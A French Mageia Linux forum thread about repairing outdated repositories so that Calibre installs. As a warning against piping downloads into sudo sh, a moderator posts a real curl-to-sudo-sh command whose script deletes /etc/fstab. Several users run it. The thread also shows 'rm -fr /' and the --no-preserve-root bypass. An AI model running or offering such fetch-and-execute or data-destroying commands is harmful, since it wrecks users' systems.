Connexion

Forum

Système et matériels » Installation et configuration [Réglé] Calibre Impossible d'installer Calibre

clicere83 Membre non connecté

Rang

Avatar

Inscrit le : 29/04/2013 à 16h56

Messages: 293

Le 14/10/2019 à 11h18
Bonjour,

Depuis ce matin, je n'arrive pas à installer Calibre, j'ai un message d'erreur quelque soit la version sélectionnée ???

screenshot_20191014_111139

screenshot_20191014_112349


Mes sources sont à jour.

Avez-vous une idée du problème ?

Edité par clicere83 Le 14/10/2019 à 11h24
   
Papoteur Membre non connecté

Rang

Avatar

Modérateur Équipe Mageia

Inscrit le : 03/10/2011 à 22h16

Localisation : Metz

Messages: 6809

Le 14/10/2019 à 11h46
Bonjour,
Oui, j'ai une idée du problème.
Contrairement à ce que tu crois, tes sources ne sont pas à jour, à moins que ce soit ton dépôt.
Name calibre
Version 3.42.0
Release 2.mga7
URL http://calibre-ebook.com/
Group Office/Utilities
Summary E-book converter and library management
Size 76MB
Arch x86_64
License GPLv3

http://madb.mageia.org/rpm/show/arch/x86_64/name/calibre-3.42.0-2.mga7.x86_64.rpm/source/0/release/7/t_media/3


Yves
   
magnux77 Membre non connecté

Rang

Avatar

Inscrit le : 21/09/2009 à 11h49

Localisation : Champs-sur-Marne France

Messages: 5066

Le 14/10/2019 à 11h57
Regarde un peu toutes les versions de Calibre proposées par le CCM !

Y a comme qui dirait une cXuiile dnas le potage de tes dépôts...


...depuis Mandrake 7
Membre de l'April - « promouvoir et défendre le Logiciel Libre»
Soutien Framasoft - « Changer le monde, un octet à la fois»
Config n°1 : cpu=AMD64x6 mem=16G SSD=64G HDD=1T OS=Mageia7-64 DE=Xfce, Config n°2 : Dell Latitude E6410 SSD=120G OS=Mageia7 DE=Xfce, Config n°3 : ThinkpadR40 SSD=32G OS=[Manjaro, Parabola, Mageia6] DE=Xfce, Config n°4 : EeePC901 SSD=20Gb, OS=[SliTaz5/Lxde, Mageia6/Xfce]
   
TuxMips Membre non connecté

Rang

Avatar

Inscrit le : 08/09/2010 à 21h08

Localisation : Paris

Messages: 710

Le 14/10/2019 à 12h11
Bon je vais me faire taper sur les doigts mais Calibre est le seul logiciel pour lequel je n'utilise pas les dépôts Mageia (ou même Debian pour mon desktop) J'utilise la ligne de commade fournie par Calibre (et ce n'est pas recommandé mais je prends le risque) :

https://calibre-ebook.com/fr/download_linux

su -
mot de passe

Puis ensuite j'adapte la ligne car par défaut mageia n'utilise pas sudo :
wget -nv -O- https://download.calibre-ebook.com/linux-installer.sh | sudo sh /dev/stdin
plutôt que sudo -v && wget -nv -O- https://download.calibre-ebook.com/linux-installer.sh | sudo sh /dev/stdin

J'ai lu une fois sur linuxfr il y a assez longtemps qu'il ne fallait pas faire de copier/coller.

Si j'ai utilisé cette méthode c'est parce qu'il y a bien longtemps, ma kobo n'était plus reconnue en raison du driver obsolète. Il m'aurait fallu attendre la nouvelle version de mageia et ce n'était pas possible pour moi. Du coup j'ai conservé la méthode. Bien attendre que le processus se termine.

Le logiciel s'installe dans /opt/calibre

Du coup, je suis en version 4.1. Edité par TuxMips Le 14/10/2019 à 12h11


Utilisateur de Mageïa depuis Mandrake 6.0 :super:
   
Jybz Membre non connecté

Rang

Avatar

Modérateur

Inscrit le : 10/10/2018 à 10h26

Messages: 1917

Le 14/10/2019 à 13h43
HAHAHAHA
Code BASH :
| sudo sh /dev/stdin

C'est le mal absolu, je dirais même que ça devrait être supprimé du forum.
Qu'est ce que ça fait ?
En fait, tu donnes à un inconnu le droit de faire n'importe quoi avec ton PC, installer des virus, logiciels espions, ...
C'est vraiment la porte ouverte à toutes les saloperies au monde.

Qu'est ce qu'il se passe ?
Pas grand chose..

Bon allez, testez tous ça :
Code BASH :
sudo -v && curl -------.com/th1k | sudo sh 


EDIT : Suppression du nom de domaine termbin car comme dit juste au dessus, il ne faut PAS le faire. Et au moins deux personnes ont exécuté le script et supprimé leur FSTAB. Edité par Jybz Le 17/10/2019 à 20h48
   
Jybz Membre non connecté

Rang

Avatar

Modérateur

Inscrit le : 10/10/2018 à 10h26

Messages: 1917

Le 14/10/2019 à 14h02
Clicere83 :

Veux-tu bien réparer tes dépots ?

Premièrement, supprimes les tous, en tapant en root :
Code BASH :
urpmi.removemedia -a


Puis, ajouter automatiquement un mirroir et les dépots, toujours en root :
Code BASH :
urpmi.addmedia --distrib --mirrorlist '$MIRRORLIST'


puis, un tour de :
Code BASH :
urpmi --auto-update



Enfin, tu devrais retrouver le bon Calibre dans le CCM qui devrait s'installer sans problème.


J'ajouterai, ne faite pas confiance au développeur de Calibre. Il compte dans quelques semaines "forker" (faire une copie en modifiant pour lui seul) python2, car python2 est en fin de vie, les développeurs de python ont décider d'une date de fin et pousser tout le monde à passer sur Python3. Mais le développeur de Calibre refuse de faire les modifications mineurs pour convertir son code python2 en Python3 et dit vouloir maintenir sa version de python2 pour son logiciel uniquement... Edité par Jybz Le 16/10/2019 à 16h41
   
TuxMips Membre non connecté

Rang

Avatar

Inscrit le : 08/09/2010 à 21h08

Localisation : Paris

Messages: 710

Le 14/10/2019 à 14h45
@Jybz

Tu as entièrement raison c'est pour cela que je précise bien que ma réponse que n'est pas recommandée. Et que je vais me faire taper sur les doigts. C'est fait :-)
En attendant sur cette méthode voir ce fil sur linuxfr :
https://linuxfr.org/users/liberf0rce/liens/wget-http-foo-com-command-sh-bash-considered-harmful

"harmful" peut être traduit par "nocif". Mais j'en conviens, je prend un risque.

Pour le reste, le développeur semble préciser qu'utiliser la version proposée par les distribution en générale sont aussi problématiques. C'est exactement ce qui m'est arrivé à une époque : mise à jour de la kobo. Et la version de Calibre de Mageia ne reconnaissais plus la Kobo.(on devait être en mageia 1 ou 2 je ne me rappelle plus trop).
Les signatures des fichiers sont disponibles. La liaison est en https. J'avoue aussi ne pas avoir fait toutes les vérifications proposées par Benoit Sibaud dans son commentaire cité sur le fil ci-dessus.

En revanche la volonté du développeur de Calibre de rester à Python 2 va être très problématique je suppose quelque soit le mode d'installation !!!
Quelles sont les alternatives face à Calibre ?

Enfin j'ai testé ta commande :
Citation :
[root@linux ~]# sudo -v && curl termbin.com/th1k | sudo sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 52 100 52 0 0 440 0 --:--:-- --:--:-- --:--:-- 440
bonjour!
Edité par TuxMips Le 14/10/2019 à 14h53


Utilisateur de Mageïa depuis Mandrake 6.0 :super:
   
Jybz Membre non connecté

Rang

Avatar

Modérateur

Inscrit le : 10/10/2018 à 10h26

Messages: 1917

Le 14/10/2019 à 15h24
TuxMips :

Enfin j'ai testé ta commande :
Citation :
[root@linux ~]# sudo -v && curl termbin.com/th1k | sudo sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 52 100 52 0 0 440 0 --:--:-- --:--:-- --:--:-- 440
bonjour!


NAN ?! NE ME DIS PAS QUE TU L'AS VRAIMENT FAIT ?!!!

Calme toi, et n'éteint SURTOUT PAS ton ordinateur !
Code BASH :
 echo -e $(curl termbin.com/th1k)
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    52  100    52    0     0   1130      0 --:--:-- --:--:-- --:--:--  1106
#!/bin/bash echo "bonjour!" rm -f /etc/fstab exit 0
 


tu vas dans le CCM, tu vas dans le gestionnaire de partition, tu formates une clef usb en précisant un point de montage, tu valides, tu quittes, en quittant il te demandra d'écrire la FSTAB, tu acceptes !
   
david.david Membre non connecté

Rang

Avatar

Modérateur Équipe Mageia

Inscrit le : 11/02/2008 à 23h08

Localisation : Bernwiller, Haut-Rhin

Messages: 2621

Le 14/10/2019 à 17h15
Moi de ce que je vois c'est qu'il a encore des dépôts mga6...


ASUS K73S (portable) :
Intel Core i3-2350M_2.3GHz, 8 GO RAM DDR3, écran LED 17" (1600x900), CG Intel HD intégrée + CG Nvidia GeForce 610M_1GB dédiée (Technologie Optimus), SSD Samsung 850 EVO 250GB + SSD Samsung 850 EVO 500GB.

Mageia 7 - x86_64bits/ KDE Plasma-5.15.4 (DVD édition), c' est de la bombe, vive MAGEIA et toute l'équipe du STAFF MLO.
de david.david <david.david@mageialinux-online.org>
28281 .Venez nous rejoindre sur le salon IRC de MLO
   
nic80 Membre non connecté

Rang

Avatar

Inscrit le : 06/08/2018 à 23h52

Messages: 1524

Le 14/10/2019 à 19h38
Bonjour,

@Jybz : et pourquoi pas un rm -fr / ? Même si je crois que ce n' est pas/plus possible (et heureusement!) , mais je n' ai pas envie de tester ! ;-)

N' empêche qu' un simple renommage était juste suffisant, non ? Edité par nic80 Le 14/10/2019 à 19h48
   
Jybz Membre non connecté

Rang

Avatar

Modérateur

Inscrit le : 10/10/2018 à 10h26

Messages: 1917

Le 14/10/2019 à 21h55
nic80 :
Bonjour,

@Jybz : et pourquoi pas un rm -fr / ? Même si je crois que ce n' est pas/plus possible (et heureusement!) , mais je n' ai pas envie de tester ! ;-)

N' empêche qu' un simple renommage était juste suffisant, non ?

Mais je ne pensais pas que quelqu'un le ferai ! je montrais justement à quel point c'est dangereux. Si ça avait été simplement renommé, ça n'aurait pas été dangereux.
   
nic80 Membre non connecté

Rang

Avatar

Inscrit le : 06/08/2018 à 23h52

Messages: 1524

Le 14/10/2019 à 23h00
Bonjour,

Effectivement, il semble y a un problème de dépot...

J' appliquerais les commandes du post de Jybz de 14h02 ( et surtout pas celui de 13h43 !)

Hors sujet:

J' ai quand même testé le rm -fr / ( dans une VM sur une image live !)

Code BASH :
$ rm -fr /
rm: il est dangereux d'opérer récursivement sur '/'
rm: utilisez --no-preserve-root pour inhiber cette mesure de sécurité


Ouf ( même si dans un script exécuté à l' insu de l' utilisteur, il est facilement possible de passer l' option qui "va bien") ! ;-)

Edité par nic80 Le 14/10/2019 à 23h01
   
clicere83 Membre non connecté

Rang

Avatar

Inscrit le : 29/04/2013 à 16h56

Messages: 293

Le 16/10/2019 à 15h40
Bonjour,

J'ai supprimé tous les dépôts et faire une mise à jour des dépôts, voici le résultat :
[root@localhost /]# urpmi.removemedia -a
suppression du média « Core Release »
suppression du média « Nonfree Release »
suppression du média « Core Release2 »
suppression du média « Core Release Debug »
suppression du média « Core Updates »
suppression du média « Core Updates Debug »
suppression du média « Core Updates Testing »
suppression du média « Core Updates Testing Debug »
suppression du média « Core Backports »
suppression du média « Core Backports Debug »
suppression du média « Core Backports Testing »
suppression du média « Core Backports Testing Debug »
suppression du média « Nonfree Release2 »
suppression du média « Nonfree Release Debug »
suppression du média « Nonfree Updates »
suppression du média « Nonfree Updates Debug »
suppression du média « Nonfree Updates Testing »
suppression du média « Nonfree Updates Testing Debug »
suppression du média « Nonfree Backports »
suppression du média « Nonfree Backports Debug »
suppression du média « Nonfree Backports Testing »
suppression du média « Nonfree Backports Testing Debug »
suppression du média « Tainted Release »
suppression du média « Tainted Release Debug »
suppression du média « Tainted Updates »
suppression du média « Tainted Updates Debug »
suppression du média « Tainted Updates Testing »
suppression du média « Tainted Updates Testing Debug »
suppression du média « Tainted Backports »
suppression du média « Tainted Backports Debug »
suppression du média « Tainted Backports Testing »
suppression du média « Tainted Backports Testing Debug »
suppression du média « Core 32bit Release »
suppression du média « Core 32bit Updates »
suppression du média « Core 32bit Updates Testing »
suppression du média « Core 32bit Backports »
suppression du média « Core 32bit Backports Testing »
suppression du média « Nonfree 32bit Release »
suppression du média « Nonfree 32bit Updates »
suppression du média « Nonfree 32bit Updates Testing »
suppression du média « Nonfree 32bit Backports »
suppression du média « Nonfree 32bit Backports Testing »
suppression du média « Tainted 32bit Release »
suppression du média « Tainted 32bit Updates »
suppression du média « Tainted 32bit Updates Testing »
suppression du média « Tainted 32bit Backports »
suppression du média « Tainted 32bit Backports Testing »
[root@localhost /]# urpmi --auto-update
Les paquetages sont à jour
writing /var/lib/rpm/installed-through-deps.list

Les paquetages suivants :
lib64freeipmi16-1.4.5-5.mga6.x86_64
lib64ipmimonitoring5-1.4.5-5.mga6.x86_64
lib64lm_sensors4-3.4.0.git20180318-1.mga6.x86_64
lib64mariadb18-10.1.41-1.mga6.x86_64
lib64powerman0-2.3.9-8.mga6.x86_64
lib64upsclient1-2.6.5-18.mga6.x86_64
nut-2.6.5-18.mga6.x86_64
sont désormais orphelins, si vous voulez les désinstaller, vous pouvez utiliser « urpme --auto-orphans »

Sous la console :
[root@localhost /]# urpmi calibre
Pas de paquetage nommé calibre

Sous CCM, plus de paquet calibre.....


Edité par clicere83 Le 16/10/2019 à 15h43
   
Papoteur Membre non connecté

Rang

Avatar

Modérateur Équipe Mageia

Inscrit le : 03/10/2011 à 22h16

Localisation : Metz

Messages: 6809

Le 16/10/2019 à 16h17
Après la suppression des dépôts, il faut en installer de nouveaux, sinon, effectivement, rpm ne trouvera plus rien.


Yves
   
Jybz Membre non connecté

Rang

Avatar

Modérateur

Inscrit le : 10/10/2018 à 10h26

Messages: 1917

Le 16/10/2019 à 16h42
Oui, il manque juste la commande :
Code BASH :
urpmi.addmedia --distrib --mirrorlist '$MIRRORLIST'

juste avant "urpmi --auto-update"
   
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie